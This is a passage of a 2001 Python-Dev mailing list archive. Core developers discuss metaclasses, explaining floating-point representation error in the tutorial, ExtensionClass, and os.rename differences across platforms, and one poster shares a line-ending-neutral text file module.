IPC9), if you wanted to see beautiful, scarcely clothed Actually, I meant the computer science lectures all those years ago. Literally one female. And-not-much-has-changed ly, Mark.
From guido at digicool.com Tue May 22 05:22:40 2001 From: guido at digicool.com (Guido van Rossum) Date: Mon, 21 May 2001 23:22:40 -0400 Subject: [Python-Dev] Classes and Metaclasses in Smalltalk In-Reply-To: Your message of "Tue, 22 May 2001 10:06:54 +1000." References: Message-ID: <200105220322.XAA13468@cj20424-a.reston1.va.home.com> Hi Alan, Thanks a lot for your input. I am cc'ing this reply to python-dev because I think my reply will be interesting for others. (Python-dev'ers: Alan expressed concern that introducing Smalltalk metaclasses would make Python unnecessarily complicated.) The way my thinking is currently going, it's not likely that Python will get a metaclass system similar to Smalltalk. However, unifying types and classes is useful for other reasons: please go to http://python.sourceforge.net/peps/ to read PEP 252 which explains how introspection can become simpler and more powerful by unifying the introspection mechanisms for types and classes. There will still be metaclasses, but the metaclasses will be less important than in Smalltalk. Class methods as commonly seen in Smalltalk are not high on my priority list, and the metaclass hierarchy won't be parallelling the regular class hierarchy. Instead, most metaclass programming will be done in C by programmers who want to implement alternative class policies. For example, the current class implementation gives each class a __dict__ for methods and class variables, and dynamically searches the class hierarchy for methods. An alternative inheritance policy could merge the __dict__ of the base class(es) with the __dict__ of the derived class at class declaration time: this would make method lookup a single dict lookup no matter how many levels of base classes are involved, at the cost of making classes less dynamic, because a change to a base class won't be seen in a derived class. 
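The alternative inheritance policy Guido describes (copying inherited attributes into the derived class at class-creation time, so a later change to a base class is not seen) can be sketched in modern Python with a metaclass that subclasses type. This is an illustration under stated assumptions, not the C-level design discussed in the thread; FlattenedMeta, Base, Dynamic and Flattened are hypothetical names, and dunder attributes are skipped so per-class machinery such as the __dict__ and __weakref__ descriptors is not copied.

```python
class FlattenedMeta(type):
    """Hypothetical metaclass: snapshot inherited attributes into the new class."""

    def __new__(mcls, name, bases, namespace):
        cls = super().__new__(mcls, name, bases, namespace)
        inherited = {}
        # Walk the real MRO from most generic to most specific, so more
        # specific definitions overwrite less specific ones.
        for klass in reversed(cls.__mro__[1:]):
            if klass is object:
                continue
            for key, value in vars(klass).items():
                if not (key.startswith("__") and key.endswith("__")):
                    inherited[key] = value
        for key, value in inherited.items():
            if key not in namespace:   # the class body always wins
                setattr(cls, key, value)
        return cls


class Base:
    def greet(self):
        return "base"


class Dynamic(Base):
    """Default policy: greet() is looked up on Base at call time."""


class Flattened(Base, metaclass=FlattenedMeta):
    """Snapshot policy: greet() was copied into this class's own dict."""


if __name__ == "__main__":
    Base.greet = lambda self: "patched"
    print(Dynamic().greet())    # sees the change to Base
    print(Flattened().greet())  # still uses the copied original
```

Lookup on Flattened now stops at its own __dict__, which is the speed-for-dynamism trade Guido mentions.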
A metaclass controls method lookup and class construction, and thus a different metaclass can be used to change this policy for selected class hierarchies without changing the default policy (which would be backwards incompatible). Other policies under control of a metaclass could include overriding hooks for getattr and setattr, alternative mechanisms to store instance variables (e.g. slot-based rather than dict-based), and so on. While I think I can make it possible to write metaclasses in pure Python (by subclassing types.TypeType), I expect that most metaprogramming will be done in C, for performance reasons and for maximum flexibility. --Guido van Rossum (home page: http://www.python.org/~guido/) From guido at digicool.com Tue May 22 05:55:26 2001 From: guido at digicool.com (Guido van Rossum) Date: Mon, 21 May 2001 23:55:26 -0400 Subject: [Python-Dev] RE: Rich comparison of lists and tuples In-Reply-To: Your message of "Mon, 21 May 2001 03:53:24 EDT." References: Message-ID: <200105220355.XAA13678@cj20424-a.reston1.va.home.com> > [Guido] > > I would like to break this down by defining the mapping between cmp() > > and rich comparisons. [Tim] > Good idea! Followed by many nitpicking questions about what I meant. As a matter of process, I think it's better to try to channel instead of challenge me. I just don't seem to have the concentration necessary to come up with all the details needed to make this worthy of a language definition, and you do. If you want a BDFL proclamation on currently gray areas in the rules, or a reversal of what the current implementation does in some cases, please draft a definition with a few leading questions. --Guido van Rossum (home page: http://www.python.org/~guido/) From tim.one at home.com Tue May 22 06:02:18 2001 From: tim.one at home.com (Tim Peters) Date: Tue, 22 May 2001 00:02:18 -0400 Subject: [Python-Dev] FP vs. 
tutorial In-Reply-To: Message-ID: [Mark Hammond, on http://www.lahey.com/float.htm] > I quite liked the tone of this note. The Python-dev morons probably could > make good sense of this, but only due to the relentless persistence of a > certain timbot. > > If not for Tim, I would have forgotten completely about binary floating > point versus decimal floating point. IIRC, me and about 40 other guys > were desperately trying to get the attention of the single CS female on > the day that lecture was given. (Actually, that is a pretty safe bet - > _all_ lectures were spent that way :) I remember guys like you. Well guess what? You ended up with a baby, while I'm known on two continents as the author of tabnanny.py. Ha! Revenge is a dish best eaten cold . > However, without a little additional background I doubt the masses would > be able to get too far into this. There's only so much you can say to unmotivated people who are also unwilling to learn. That's not my problem. Finding them a gentle intro from which they *could* learn isn't either, but typing a URL is easy enough that I don't mind. Here: I want to script MS Word with Python. I don't know COM and refuse to learn anything about it. I'd rather not install win32all either, and import statements confuse me. Why don't you make it easy for me? It's the same thing -- you can point them at what they need to learn if they're serious, else they're simply out of luck. [And on] >> http://www.python.org/cgi-bin/moinmoin/RepresentationError > > IMO, this is a little worse. In one sense it's much worse: it's only trying to explain a single cause of fp surprises. OTOH, it explains it precisely while giving the reader the tools needed to do an exact analysis of any case of that particular class. The Lahey link touches on all the common sources of surprises, but leaves them fuzzy. > There is less "background". Eg, in almost the first paragraph we see:
>
> """
> Rewriting
>
>      1        J
>     ---  ~=  ----
>     10       2**N
> """
>
> And I went "huh?
Where did j and N spring from?". Reading a bit further > made it clear, but this document did seem a little impenetrable to > floating point or maths newbies. It did its job for them if it simply scared them <0.5 wink>. > It seems to me that the RepresentationError document was written for > people with a decent background in maths - There's nothing more complicated than integer division there. > exactly the sort of people who _don't_ need such a document. They actually do: regardless of math background, nothing about f.p. is obvious before studying f.p. as a subject in its own right. It's "not like" anything else, and in previous lives I spent a good chunk of my work time explaining the same stuff to doctorates. Mathematicians were actually the hardest audience at first, perhaps because they had the hardest time admitting they didn't already understand it; after getting beyond bruised professional pride, though, they were the easiest audience to bring up to speed. From tim at digicool.com Tue May 22 06:58:21 2001 From: tim at digicool.com (Tim Peters) Date: Tue, 22 May 2001 00:58:21 -0400 Subject: [Python-Dev] FP vs. tutorial In-Reply-To: Message-ID: [Michel Pelletier, on http://www.lahey.com/float.htm] > I liked the tone too, but it really goes into a lot of detail, there's > this problem, and that one, oh and also *this* one and then there's > *that* and the other thing, and after a while you get the impression > that floating-point is for the insane. Using an unfamiliar power tool with sharp edges, and while blindfolded, is insane. [and on http://www.python.org/cgi-bin/moinmoin/RepresentationError] > I agree. Equations should not be needed to explain this. There's exactly one equation on that page, saying that one ratio of two integers is approximately equal to another ratio of two integers. 
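The single equation Tim refers to, 1/10 ~= J/2**N with J an integer of exactly 53 bits, can be checked with plain integer arithmetic. This sketch assumes IEEE-754 double precision (a 53-bit significand, rounded to nearest with ties to even), as on the platforms discussed. The helper best_binary_approx is hypothetical, and fractions.Fraction is used only to confirm that the result matches the float Python actually stores for 0.1.

```python
from fractions import Fraction

PRECISION = 53  # significand bits of an IEEE-754 double (assumed platform format)


def best_binary_approx(num: int, den: int, precision: int = PRECISION):
    """Return (J, N) with J / 2**N the nearest approximation to num/den
    using a J of exactly `precision` bits.

    Sketch only: assumes 0 < num/den < 2**(precision - 1), so N >= 0.
    """
    n = 0
    # Smallest N with 2**(precision-1) <= num/den * 2**N, so J has `precision` bits.
    while (num << n) // den < (1 << (precision - 1)):
        n += 1
    q, r = divmod(num << n, den)
    # Round to nearest, ties to even (IEEE-754's default rounding mode).
    if 2 * r > den or (2 * r == den and q & 1):
        q += 1
    if q == 1 << precision:  # rounding carried into an extra bit
        q >>= 1
        n -= 1
    return q, n


J, N = best_binary_approx(1, 10)
print(J, N)                                # the J and N in 1/10 ~= J/2**N
print(Fraction(J, 2**N) == Fraction(0.1))  # same value the float 0.1 stores
print(Fraction(0.1) - Fraction(1, 10))     # the representation error, exactly
print("%.17g" % 0.1)                       # 17 significant digits expose it
```

The remainder after dividing 2**56 by 10 is 6, more than half of 10, so J is rounded up. The stored value is therefore slightly larger than 1/10, which is why 17 significant digits show 0.10000000000000001.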
If that's too much for you, and you weren't satisfied with the *initial* hand-wavy explanation ("1/10 is not exactly representable as a binary fraction") either, then it's up to you to do better than the latter without actually saying anything useful : Q: Why is Python broken: >>> 0.1 0.10000000000000001 A: [your turn] From gward at python.net Tue May 22 15:41:57 2001 From: gward at python.net (Greg Ward) Date: Tue, 22 May 2001 09:41:57 -0400 Subject: [Python-Dev] FP vs. tutorial In-Reply-To: ; from tim@digicool.com on Mon, May 21, 2001 at 05:57:22PM -0400 References: Message-ID: <20010522094157.A1245@gerg.ca> On 21 May 2001, Tim Peters said: > + Happy to add text explaining the existence of surprises, and > providing a URL. Do the floating-point morons on Python-Dev > find this one comprehensible?: > > http://www.lahey.com/float.htm I found this article more useful, interesting, and informative than whatever I learned about binary floating-point in my academic years. Good link, Tim. Two catches: * I can just barely follow the FORTRAN examples; I very much doubt the average Python newbie would have any more luck than me * I tried several of the FORTRAN examples in Python, and did not witness any of the gotchas they are meant to illustrate. Possibly it's just single-precision vs. double-precision difference, but Python 2.1 under Linux 2.2 on an Athlon compiled with gcc 2.95.2 doesn't demonstrate the same gotchas as that article does. Greg -- Greg Ward - geek gward at python.net http://starship.python.net/~gward/ Ban the bomb -- save the world for conventional warfare. From skip at pobox.com Tue May 22 18:01:40 2001 From: skip at pobox.com (skip at pobox.com) Date: Tue, 22 May 2001 11:01:40 -0500 Subject: [Python-Dev] type/class unification and ExtensionClass Message-ID: <15114.36196.4677.99240@beluga.mojam.com> I know Guido has recently been working on some of the type/class unification issues (PEPs 252 and 253). Will this affect ExtensionClass? 
In particular, will it go away or have to be reworked significantly for Python 2.2 or 2.3? The new PyGtk wrappers use the ExtensionClass module. I'm curious about how hard it would be to move away from ExtensionClass for these wrappers. My reading of PEP 253 suggests this shouldn't be too difficult. I'd ask Guido directly, but I figure other people on this list might also have useful input on the issue and/or be able to answer, saving him the time. At any rate, he will see it posted here just the same. Thx, Skip From guido at digicool.com Tue May 22 18:23:52 2001 From: guido at digicool.com (Guido van Rossum) Date: Tue, 22 May 2001 12:23:52 -0400 Subject: [Python-Dev] type/class unification and ExtensionClass In-Reply-To: Your message of "Tue, 22 May 2001 11:01:40 CDT." <15114.36196.4677.99240@beluga.mojam.com> References: <15114.36196.4677.99240@beluga.mojam.com> Message-ID: <200105221623.f4MGNqC02110@odiug.digicool.com> > I know Guido has recently been working on some of the type/class unification > issues (PEPs 252 and 253). And I'm not done yet. :-) > Will this affect ExtensionClass? In particular, > will it go away or have to be reworked significantly for Python 2.2 or 2.3? Probably. Jim Fulton in particular asked me to work on this because he wants to phase out ExtensionClass. > The new PyGtk wrappers use the ExtensionClass module. I'm curious about how > hard it would be to move away from ExtensionClass for these wrappers. My > reading of PEP 253 suggests this shouldn't be too difficult. I don't think so either. > I'd ask Guido directly, but I figure other people on this list might also > have useful input on the issue and/or be able to answer, saving him the > time. At any rate, he will see it posted here just the same. --Guido van Rossum (home page: http://www.python.org/~guido/) From michel at digicool.com Tue May 22 23:44:09 2001 From: michel at digicool.com (Michel Pelletier) Date: Tue, 22 May 2001 14:44:09 -0700 (PDT) Subject: [Python-Dev] FP vs. 
tutorial In-Reply-To: Message-ID: On Tue, 22 May 2001, Tim Peters wrote: > [Michel Pelletier, on http://www.lahey.com/float.htm] > > I liked the tone too, but it really goes into a lot of detail, there's > > this problem, and that one, oh and also *this* one and then there's > > *that* and the other thing, and after a while you get the impression > > that floating-point is for the insane. > > Using an unfamiliar power tool with sharp edges, and while blindfolded, is > insane. I should have been more clear, I liked the first couple of paragraphs for their descriptions, and there is certainly nothing wrong with the document as it stands, but such an explanation would be a bit too lengthy and boring to a typical fifth grader or photoshop guru going through the Tutorial and dabbling in programming for the very first time. > [and on http://www.python.org/cgi-bin/moinmoin/RepresentationError] > > > I agree. Equations should not be needed to explain this. > > There's exactly one equation on that page, saying that one ratio of two > integers is approximately equal to another ratio of two integers. Who was it that said every equation will halve your audience? I agree with that, the tutorial should try to be as broad and simple as possible. > If that's > too much for you, and you weren't satisfied with the *initial* hand-wavy > explanation ("1/10 is not exactly representable as a binary fraction") > either, then it's up to you to do better than the latter without actually > saying anything useful : The latter is fine, although I think the first document hand-waves better. -Michel From skip at pobox.com Tue May 22 23:54:42 2001 From: skip at pobox.com (skip at pobox.com) Date: Tue, 22 May 2001 16:54:42 -0500 Subject: [Python-Dev] unifying os.rename semantics across platform Message-ID: <15114.57378.887742.531145@beluga.mojam.com> Couldn't figure out why this message never generated any comment.
Turns out it didn't reach the list because the host I sent it from (dynamic4.tttech.com) couldn't be resolved. I just noticed it in my errors mailbox and am sending it out again. ------------------------------------------------------------------------------ It was brought to my attention a week ago by a client that os.rename semantics differ between Unix and Windows. On Unix, if the destination file already exists it is silently deleted. On Windows, an exception is raised. I was able to verify this for Python 2.0 on Windows98. I assume nothing changed for 2.1, but I can't verify that. (Windows trashed my partition table and my Linux root partition while I was downloading 2.1. Consequently, I no longer run Windows. Take that, Bill...) I haven't checked the Mac yet (will do that when I get back to the US), but I think that os.rename should have the same semantics across all platforms. To the extent reasonably possible, I think this should also be true of other common functions exposed through the os module. On the (unsupportable) theory that to-date, more Python apps have been written and/or deployed on Unix-like systems and that where Windows apps are concerned, many developers will have added a thin wrapper to mimic the Unix semantics, I think less breakage would result if the Unix semantics were implemented in the Windows version. It appears that is what POSIX compliance would demand as well. Skip From fdrake at acm.org Tue May 22 23:55:29 2001 From: fdrake at acm.org (Fred L. Drake, Jr.) Date: Tue, 22 May 2001 17:55:29 -0400 (EDT) Subject: [Python-Dev] FP vs. tutorial In-Reply-To: References: Message-ID: <15114.57425.540688.205255@cj42289-a.reston1.va.home.com> Michel Pelletier writes: > as it stands, but such an explanation would be a bit too lengthy and > boring to a typical fifth grader or photoshop guru going through the > Tutorial and dabbling in programming for the very first time.
But that's not the audience the Python Tutorial is targeted to -- readers are expected to be essentially competent in at least one "3rd generation" language. Maybe a few will shy away from a simple equation, but not so many. Those who do would do well to shy away from FP as well. ;-) -Fred -- Fred L. Drake, Jr. PythonLabs at Digital Creations From fdrake at acm.org Wed May 23 00:04:11 2001 From: fdrake at acm.org (Fred L. Drake, Jr.) Date: Tue, 22 May 2001 18:04:11 -0400 (EDT) Subject: [Python-Dev] unifying os.rename semantics across platform In-Reply-To: <15114.57378.887742.531145@beluga.mojam.com> References: <15114.57378.887742.531145@beluga.mojam.com> Message-ID: <15114.57947.313813.522806@cj42289-a.reston1.va.home.com> skip at pobox.com writes: > On the (unsupportable) theory that to-date, more Python apps have been > written and/or deployed on Unix-like systems and that where Windows apps are > concerned, many developers will have added a thin wrapper to mimic the Unix > semantics, I think less breakage would result if the Unix semantics were I don't know whether there are more deployed Python apps on Unix than on Windows (and I've no good idea about how to find out), but I think unifying the semantics one way or the other is a good thing. Regardless of which set of semantics is chosen. -Fred -- Fred L. Drake, Jr. PythonLabs at Digital Creations From mwh at python.net Wed May 23 00:07:12 2001 From: mwh at python.net (Michael Hudson) Date: 22 May 2001 23:07:12 +0100 Subject: [Python-Dev] FP vs. tutorial In-Reply-To: Michel Pelletier's message of "Tue, 22 May 2001 14:44:09 -0700 (PDT)" References: Message-ID: Michel Pelletier writes: > Who was it that said every equation will halve your audience? It was Stephen Hawking's editor when he was preparing A Brief History Of Time (or at least, it gets mentioned in the preface; the advice may be older). Cheers, M. -- 7. It is easier to write an incorrect program than understand a correct one.
-- Alan Perlis, http://www.cs.yale.edu/homes/perlis-alan/quotes.html From jeremy at digicool.com Wed May 23 00:57:40 2001 From: jeremy at digicool.com (Jeremy Hylton) Date: Tue, 22 May 2001 18:57:40 -0400 (EDT) Subject: [Python-Dev] FP vs. tutorial In-Reply-To: References: Message-ID: <15114.61156.692322.674137@slothrop.digicool.com> >>>>> "MWH" == Michael Hudson writes: MWH> Michel Pelletier writes: >> Who was it that said every equation will halve your audience? MWH> It was Stephen Hawking's editor when he was preparing A Brief MWH> History Of Time (or at least, it gets mentioned in the preface; MWH> the advice may be older). There's a similar saw about excerpts of books in foreign languages. I believe I first read it in reference to Umberto Eco's Foucault's Pendulum, which starts with a full page of Hebrew. Jeremy From chrishbarker at home.net Wed May 23 01:21:01 2001 From: chrishbarker at home.net (Chris Barker) Date: Tue, 22 May 2001 16:21:01 -0700 Subject: [Pythonmac-SIG] Re: [Python-Dev] Import hook to do end-of-line conversion? References: <20010414192445-r01010600-f8273ce6@213.84.27.177> Message-ID: <3B0AF45D.732126E6@home.net> Just van Rossum wrote: > Agreed. I'll try to write one, once I'm feeling better: having the flu doesn't > seem to help focussing on actual content... > > Just Just (or anyone else) Have you made any progress on this PEP? I'd like to see it happen, so if you haven't done it, I'll try to find the time to make a start on it myself. I have written a simple class that implements a line-ending-neutral text file class. I wrote it because I have a need for it, and I thought it would be a reasonable prototype for any syntax and methods we might want to use in an actual implementation. I doubt anyone would find the methods I used particularly clean or elegant (or fast) but it's the first thing I've come up with, and it seems to work. I've enclosed the module with this email. If that doesn't work, let me know and I'll put it on a website.
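The core of the module posted below, in its `read()` and `readlines()` methods, is a normalize-then-split step: fold "\r\n" and any lone "\r" into "\n", then split. Here is a minimal standalone sketch of that idea in present-day Python. The function name `split_universal` is hypothetical and is not part of the posted TextFile.py.

```python
def split_universal(data):
    r"""Split text whose lines end in "\r\n" (DOS), "\r" (Mac) or "\n" (Posix),
    possibly mixed, into lines that each end in a single "\n".

    Hypothetical helper, not part of TextFile.py. A final line without a
    line ending is returned without one.
    """
    # Translate "\r\n" first; otherwise each DOS ending would become two breaks.
    normalized = data.replace("\r\n", "\n").replace("\r", "\n")
    pieces = normalized.split("\n")
    # Every piece except the last was followed by a line ending.
    lines = [piece + "\n" for piece in pieces[:-1]]
    if pieces[-1]:
        lines.append(pieces[-1])
    return lines


print(split_universal("one\r\ntwo\rthree\nfour"))
# ['one\n', 'two\n', 'three\n', 'four']
```

In present-day Python, opening a file in text mode with the default `newline=None` already performs this translation ("universal newlines"), so a helper like this is mainly useful for data that arrives as a string.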
-Chris -- Christopher Barker, Ph.D. ChrisHBarker at home.net --- --- --- http://members.home.net/barkerlohmann ---@@ -----@@ -----@@ ------@@@ ------@@@ ------@@@ Oil Spill Modeling ------ @ ------ @ ------ @ Water Resources Engineering ------- --------- -------- Coastal and Fluvial Hydrodynamics -------------------------------------- ------------------------------------------------------------------------ -------------- next part -------------- #!/usr/bin/env python """ TextFile.py : a module that provides a UniversalTextFile class, and a replacement for the native python "open" command that provides an interface to that class. It would usually be used as: from TextFile import open then you can use the new open just like the old one (with some added flags and arguments) or import TextFile file = TextFile.open(filename,flags,[bufsize], [LineEndingType], [LineBufferSize]) """ import os ## Re-map the open function _OrigOpen = open def open(filename,flags = "",bufsize = -1, LineEndingType = "", LineBufferSize = ""): """ A new open function, that returns a regular python file object for the old calls, and returns a new nifty universal text file when required. This works just like the regular open command, except that a new flag and a new parameter have been added. Call: file = open(filename,flags = "",bufsize = -1, LineEndingType = ""): - filename is the name of the file to be opened - flags is a string of one letter flags, the same as the standard open command, plus a "t" for universal text file. - - "b" means binary file, this returns the standard binary file object - - "t" means universal text file - - "r" for read only - - "w" for write. If there is both "w" and "t" then the user can specify a line ending type to be used with the LineEndingType parameter. - - "a" means append to existing file - bufsize specifies the buffer size to be used by the system.
Same as the regular open function - LineEndingType is used only for writing (and appending) files, to specify a non-native line ending to be written. - - The options are: "native", "DOS", "Posix", "Unix", "Mac", or the characters themselves ("\r\n", etc.). "native" will result in using the standard file object, which uses whatever is native for the system that python is running on. - LineBufferSize is the size of the buffer used to read data in a readline() operation. The default is currently set to 100 characters. If you will be reading files with many lines over 100 characters long, you should set this number to the largest expected line length. """ if "t" in flags: # this is a universal text file if ("w" in flags or "a" in flags) and LineEndingType == "native": return _OrigOpen(filename,flags.replace("t",""), bufsize) return UniversalTextFile(filename,flags,LineEndingType,LineBufferSize) else: # this is a regular old file return _OrigOpen(filename,flags,bufsize) class UniversalTextFile: """ A class that acts just like a python file object, but has a mode that allows the reading of arbitrary formatted text files, i.e. with either Unix, DOS or Mac line endings. [\n , \r\n, or \r] To keep it truly universal, it checks for each of these line ending possibilities at every line, so it should work on a file with mixed endings as well.
""" def __init__(self,filename,flags = "",LineEndingType = "native",LineBufferSize = ""): self._file = _OrigOpen(filename,flags.replace("t","")+"b") LineEndingType = LineEndingType.lower() if LineEndingType in ("native", ""): # "" is open()'s default; os.linesep is a string, not a function self.LineSep = os.linesep elif LineEndingType == "dos": self.LineSep = "\r\n" elif LineEndingType == "posix" or LineEndingType == "unix" : self.LineSep = "\n" elif LineEndingType == "mac": self.LineSep = "\r" else: self.LineSep = LineEndingType ## some attributes self.closed = 0 self.mode = flags self.softspace = 0 if LineBufferSize: self._BufferSize = LineBufferSize else: self._BufferSize = 100 def readline(self): start_pos = self._file.tell() ##print "Current file position is:", start_pos line = "" TotalBytes = 0 Buffer = self._file.read(self._BufferSize) while Buffer: ##print "Buffer = ",repr(Buffer) newline_pos = Buffer.find("\n") return_pos = Buffer.find("\r") if return_pos == newline_pos-1 and return_pos >= 0: # we have a DOS line line = Buffer[:return_pos]+ "\n" TotalBytes = newline_pos+1 break elif ((return_pos < newline_pos) or newline_pos < 0 ) and return_pos >=0: # we have a Mac line line = Buffer[:return_pos]+ "\n" TotalBytes = return_pos+1 break elif newline_pos >= 0: # we have a Posix line line = Buffer[:newline_pos]+ "\n" TotalBytes = newline_pos+1 break else: # we need a larger buffer NewBuffer = self._file.read(self._BufferSize) if NewBuffer: Buffer = Buffer + NewBuffer else: # we are at the end of the file, without a line ending. self._file.seek(start_pos + len(Buffer)) return Buffer self._file.seek(start_pos + TotalBytes) return line def readlines(self,sizehint = None): """ readlines acts like the regular readlines, except that it understands any of the standard text file line endings ("\r\n", "\n", "\r"). If sizehint is used, it will read a maximum of that many bytes. It will not round up, as the regular readlines does. This means that if your buffer size is less than the length of the next line, you won't get anything.
""" if sizehint: Data = self._file.read(sizehint) else: Data = self._file.read() if len(Data) == sizehint: #print "The buffer is full" FullBuffer = 1 else: FullBuffer = 0 Data = Data.replace("\r\n","\n").replace("\r","\n") Lines = [line + "\n" for line in Data.split('\n')] #print Lines ## If the last line is only a linefeed it is an extra line if Lines[-1] == "\n": del Lines[-1] ## if it isn't then the last line didn't have a linefeed, so we need to remove the one we put on. else: ## or it's the end of the buffer if FullBuffer: #print "the file is at:",self._file.tell() #print "the last line has length:",len(Lines[-1]) self._file.seek(-(len(Lines[-1])-1),1) # reset the file position del(Lines[-1]) else: Lines[-1] = Lines[-1][:-1] return Lines def readnumlines(self,NumLines = 1): """ readnumlines is an extension to the standard file object. It returns a list containing the number of lines that are requested. I have found this to be very useful, and allows me to avoid the many loops like: lines = [] for i in range(N): lines.append(file.readline()) Also, if I ever get around to writing this in C, it will provide a speed improvement. """ Lines = [] while len(Lines) < NumLines: Lines.append(self.readline()) return Lines def read(self,size = None): """ read acts like the regular read, except that it translates any of the standard text file line endings ("\r\n", "\n", "\r") into a "\n". If size is used, it will read a maximum of that many bytes, before translation. This means that if the line endings have more than one character, the size returned will be smaller. This could be patched, but it didn't seem worth it. If you want that much control, use a binary file. """ if size: Data = self._file.read(size) else: Data = self._file.read() return Data.replace("\r\n","\n").replace("\r","\n") def write(self,string): """ write is just like the regular one, except that it uses the line separator specified when the file was opened for writing or appending.
""" self._file.write(string.replace("\n",self.LineSep)) def writelines(self,list): for line in list: self.write(line) # The rest of the standard file methods mapped def close(self): self._file.close() self.closed = 1 def flush(self): self._file.flush() def fileno(self): return self._file.fileno() def seek(self,offset,whence = 0): self._file.seek(offset,whence) def tell(self): return self._file.tell() From guido at digicool.com Wed May 23 01:46:53 2001 From: guido at digicool.com (Guido van Rossum) Date: Tue, 22 May 2001 19:46:53 -0400 Subject: [Python-Dev] unifying os.rename semantics across platform In-Reply-To: Your message of "Tue, 22 May 2001 16:54:42 CDT." <15114.57378.887742.531145@beluga.mojam.com> References: <15114.57378.887742.531145@beluga.mojam.com> Message-ID: <200105222346.f4MNkr104833@odiug.digicool.com> > It was brought to my attention a week ago by a client that os.rename > semantics differ between Unix and Windows. On Unix, if the destination file > already exists it is silently deleted. On Windows, an exception is raised. > I was able to verify this for Python 2.0 on Windows98. I assume nothing > changed for 2.1, but I can't verify that. I've always known this, and assumed it was common knowledge. Sorry. ;-) > (Windows trashed my partition > table and my Linux root partition while I was downloading 2.1. > Consequently, I no longer run Windows. Take that, Bill...) I haven't > checked the Mac yet (will do that when I get back to the US), but I think > that os.rename should have the same semantics across all platforms. To the > extent reasonably possible, I think this should also be true of other common > functions exposed through the os module. 
> > On the (unsupportable) theory that to-date, more Python apps have been > written and/or deployed on Unix-like systems and that where Windows apps are > concerned, many developers will have added a thin wrapper to mimic the Unix > semantics, I think less breakage would result if the Unix semantics were > implemented in the Windows version. It appears that is what POSIX > compliance would demand as well. > > Skip I certainly wouldn't want to try to emulate the Windows semantics on Unix. However, I think that emulating the correct Posix semantics on Windows is not possible either. The Posix rename() call guarantees that it is atomic: there is no point in time where the file doesn't exist at all (and a system or program crash can't delete the file). I wouldn't know how to do that in Windows -- the straightforward version if os.path.exists(target): os.unlink(target) os.rename(source, target) leaves a vulnerability open where the target doesn't exist and if at that point the system crashes or the program is killed, you lose the target. I would prefer to document the difference so applications can decide how to deal with this. --Guido van Rossum (home page: http://www.python.org/~guido/) From guido at digicool.com Wed May 23 01:50:29 2001 From: guido at digicool.com (Guido van Rossum) Date: Tue, 22 May 2001 19:50:29 -0400 Subject: [Python-Dev] FP vs. tutorial In-Reply-To: Your message of "Tue, 22 May 2001 14:44:09 PDT." References: Message-ID: <200105222350.f4MNoUj04853@odiug.digicool.com> > Who was it that said every equation will halve your audience? Einstein. > I agree with that, the tutorial should try to be as broad and simple > as possible. But keep in mind that the particular Python tutorial we're talking about is intended for an audience of folks who already know how to program. I vote against dumbing this down. 
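For readers who do want the one equation from the RepresentationError page: the double nearest 1/10 has the form J/2**N, where J is a 53-bit integer. The sketch below, in present-day Python, finds J and N by exact rational arithmetic and checks the result against Python's own conversion of the literal 0.1. The helper name `nearest_binary_fraction` is hypothetical; `fractions.Fraction` and `float.as_integer_ratio()` are standard-library features.

```python
from fractions import Fraction

def nearest_binary_fraction(num, den, bits=53):
    """Return (J, N) such that J / 2**N is the closest fraction to num/den
    whose numerator J has exactly `bits` bits.

    Hypothetical helper; assumes num/den > 0 and ignores the corner case
    where rounding carries J up to 2**bits.
    """
    x = Fraction(num, den)
    n = 0
    # Scale by powers of two until 2**(bits-1) <= x * 2**n < 2**bits.
    while x * Fraction(2) ** n < 2 ** (bits - 1):
        n += 1
    while x * Fraction(2) ** n >= 2 ** bits:
        n -= 1
    # round() on a Fraction returns an int, rounding ties to even.
    j = round(x * Fraction(2) ** n)
    return j, n


j, n = nearest_binary_fraction(1, 10)
print(j, n)                                 # 7205759403792794 56
print(Fraction(j, 2 ** n) == Fraction(0.1))  # True
print((0.1).as_integer_ratio())             # (3602879701896397, 36028797018963968)
```

`as_integer_ratio()` reports the same value in lowest terms: J is even, so J/2**56 reduces to 3602879701896397/2**55.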
--Guido van Rossum (home page: http://www.python.org/~guido/) From michel at digicool.com Wed May 23 02:17:59 2001 From: michel at digicool.com (Michel Pelletier) Date: Tue, 22 May 2001 17:17:59 -0700 (PDT) Subject: [Python-Dev] FP vs. tutorial In-Reply-To: <200105222350.f4MNoUj04853@odiug.digicool.com> Message-ID: On Tue, 22 May 2001, Guido van Rossum wrote: > > I agree with that, the tutorial should try to be as broad and simple > > as possible. > > But keep in mind that the particular Python tutorial we're talking > about is intended for an audience of folks who already know how to > program. I vote against dumbing this down. Now that I've actually read the tutorial (wink) I see the true target audience. For some reason, I thought it was oriented more toward the CP4E audience. Is there a python "children's book" complete with big red dogs and rabbits in waistcoats? That would be an interesting project... -Michel From guido at digicool.com Wed May 23 02:20:25 2001 From: guido at digicool.com (Guido van Rossum) Date: Tue, 22 May 2001 20:20:25 -0400 Subject: [Python-Dev] FP vs. tutorial In-Reply-To: Your message of "Tue, 22 May 2001 17:17:59 PDT." References: Message-ID: <200105230020.f4N0KPU05103@odiug.digicool.com> > Is there a python "children's book" complete with big red dogs and rabbits > in waistcoats? That would be an interesting project... See http://www.python.org/sigs/edu-sig/ and http://www.python.org/doc/Intros.html (the latter has a section with intros for non-programmers). --Guido van Rossum (home page: http://www.python.org/~guido/) From tim.one at home.com Wed May 23 02:23:42 2001 From: tim.one at home.com (Tim Peters) Date: Tue, 22 May 2001 20:23:42 -0400 Subject: [Python-Dev] FP vs. tutorial In-Reply-To: Message-ID: I struggled with a way to do a better job of explaining this stuff last night. 
As I see others already said, the Tutorial is not aimed at script kiddies, or non-programmers, or even programming newbies, but at programmers who are simply new to Python. So everything I put in the tutorial was either jarringly out of place, or inadequate to address the audience you (Michel) have in mind. But I agree that's an important audience, and I spend a fair chunk of my life now anyway explaining this stuff over & over to those who think computing a ratio of two integers is akin to solving fourth order differential equations . In the end I decided to write a Tutorial Appendix in a much gentler style. It doesn't really fit with the rest of the Tutorial, but then that's *why* it's an Appendix. The patch is here: http://sourceforge.net/tracker/index.php?func=detail&aid=426208&group_id=5470&atid=305470 I also changed the tutorial fp examples so they have an excellent chance of displaying the same strings across all platforms, and even if Python 10K defaults to decimal floating-point someday (perhaps in the year 10000, as its name suggests). From gward at python.net Wed May 23 02:33:11 2001 From: gward at python.net (Greg Ward) Date: Tue, 22 May 2001 20:33:11 -0400 Subject: [Python-Dev] unifying os.rename semantics across platform In-Reply-To: <200105222346.f4MNkr104833@odiug.digicool.com>; from guido@digicool.com on Tue, May 22, 2001 at 07:46:53PM -0400 References: <15114.57378.887742.531145@beluga.mojam.com> 